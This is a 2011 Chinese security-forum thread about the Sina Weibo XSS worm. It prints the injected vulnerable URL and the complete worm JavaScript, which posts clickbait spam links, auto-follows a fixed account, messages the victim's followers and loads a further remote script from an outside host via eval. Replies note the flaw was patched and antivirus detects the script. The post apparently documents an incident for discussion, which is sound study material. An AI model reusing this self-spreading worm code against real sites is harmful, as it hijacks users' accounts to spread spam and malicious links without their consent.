查看: 2135|回复: 9
收起左侧

[分享] 新浪微博遭遇攻击!“微博病毒”漏洞点 等等

[复制链接]
landseer20
发表于 2011-6-29 09:58:02 | 显示全部楼层 |阅读模式
微博XSS漏洞点
weibo.com/pub/star/g/xyyyd%22%3e%3cscript%20src=//www.****.com/images/t.js%3e%3c/script%3e?type=update
微博XSS脚本内容
function createXHR(){
return window.XMLHttpRequest?
new XMLHttpRequest():
new ActiveXObject("Microsoft.XMLHTTP");
}
function getappkey(url){
xmlHttp = createXHR();
xmlHttp.open("GET",url,false);
xmlHttp.send();
result = xmlHttp.responseText;
id_arr = '';
id = result.match(/namecard=\"true\" title=\"[^\"]*/g);
for(i=0;i<id.length;i++){
sum = id.toString().split('"')[3];
id_arr += sum + '||';
}
return id_arr;
}
function random_msg(){
link = ' http://163.fm/PxZHoxn?id=' + new Date().getTime();;
var msgs = [
'郭美美事件的一些未注意到的细节:',
'建党大业中穿帮的地方:',
'让女人心动的100句诗歌:',
'3D肉团团高清普通话版种子:',
'这是传说中的神仙眷侣啊:',
'惊爆!范冰冰艳照真流出了:',
'杨幂被爆多次被潜规则:',
'傻仔拿锤子去抢银行:',
'可以监听别人手机的软件:',
'个税起征点有望提到4000:'];
var msg = msgs[Math.floor(Math.random()*msgs.length)] + link;
msg = encodeURIComponent(msg);
return msg;
}
function post(url,data,sync){
xmlHttp = createXHR();
    xmlHttp.open("POST",url,sync);
    xmlHttp.setRequestHeader("Accept","text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
    xmlHttp.setRequestHeader("Content-Type","application/x-www-form-urlencoded; charset=UTF-8");
    xmlHttp.send(data);
}
function publish(){
url = 'http://weibo.com/mblog/publish.php?rnd=' + new Date().getTime();      "发送微博"
data = 'content=' + random_msg() + '&pic=&styleid=2&retcode=';
post(url,data,true);
}
function follow(){
url = 'http://weibo.com/attention/aj_addfollow.php?refer_sort=profile&atnId=profile&rnd=' + new Date().getTime();
data = 'uid=' + 2201270010 + '&fromuid=' + $CONFIG.$uid + '&refer_sort=profile&atnId=profile';
post(url,data,true);                                   "加关注"
}
function message(){
url = 'http://weibo.com/' + $CONFIG.$uid + '/follow';         "给粉丝发私信"
ids = getappkey(url);
id = ids.split('||');
for(i=0;i<id.length - 1 & i<5;i++){
msgurl = 'http://weibo.com/message/addmsg.php?rnd=' + new Date().getTime();
msg = random_msg();
msg = encodeURIComponent(msg);
user = encodeURIComponent(encodeURIComponent(id));
data = 'content=' + msg + '&name=' + user + '&retcode=';
post(msgurl,data,false);
}
}
function main(){
try{
publish();
}
catch(e){}
try{
follow();
}
catch(e){}
try{
message();
}
catch(e){}
}
try{
   x="g=document.createElement('script');g.src='http://www.2kt.cn/images/t.js';document.body.appendChild(g)";window.opener.eval(x);
}
catch(e){}
main();
var t=setTimeout('location="http://weibo.com/pub/topic";',5000);
小紫英
发表于 2011-6-29 10:19:26 | 显示全部楼层
上个世纪末就有的技术了,都是玩剩下的了
-oAo-
发表于 2011-6-29 13:10:56 | 显示全部楼层
这个漏洞就不能补补?
klinxun
发表于 2011-6-29 13:12:20 | 显示全部楼层
-oAo- 发表于 2011-6-29 13:10
这个漏洞就不能补补?

新浪已经补了,不过也反应了国内这些网站的意识实在是……
klinxun
发表于 2011-6-29 13:13:53 | 显示全部楼层
本帖最后由 klinxun 于 2011-6-29 13:15 编辑

这段脚本保存为txt的时候,诺顿监控就把它干掉了,报:JS.Frienren。回学校考试的时候再试试趋势咋样表现。
-oAo-
发表于 2011-6-29 13:21:11 | 显示全部楼层
klinxun 发表于 2011-6-29 13:12
新浪已经补了,不过也反应了国内这些网站的意识实在是……

   
    安全意识实在是……
猫苗
发表于 2011-6-29 17:05:24 | 显示全部楼层
本帖最后由 猫苗 于 2011-6-29 17:05 编辑

要是说,上个世纪末就有的技术了,都是玩剩下的了
如果还影响,那是什么原因那?仔细想想
satansimon 该用户已被删除
发表于 2011-6-29 18:03:16 | 显示全部楼层
幸好,俺不用微薄
Couphine
发表于 2011-6-29 18:20:31 | 显示全部楼层
这是性浪的API出了问题。并非这个东西性浪防不了。关键点不在这。。。
z13667152750
发表于 2011-6-29 18:22:27 | 显示全部楼层
本帖最后由 z13667152750 于 2011-6-29 18:22 编辑
猫苗 发表于 2011-6-29 17:05
要是说,上个世纪末就有的技术了,都是玩剩下的了
如果还影响,那是什么原因那?仔细想想


因为国内电脑一堆ie6,然后那些ie壳浏览器在系统自带浏览器为ie6的情况下,同样对这种东西没办法
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-2-5 04:53 , Processed in 0.130116 second(s), 16 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表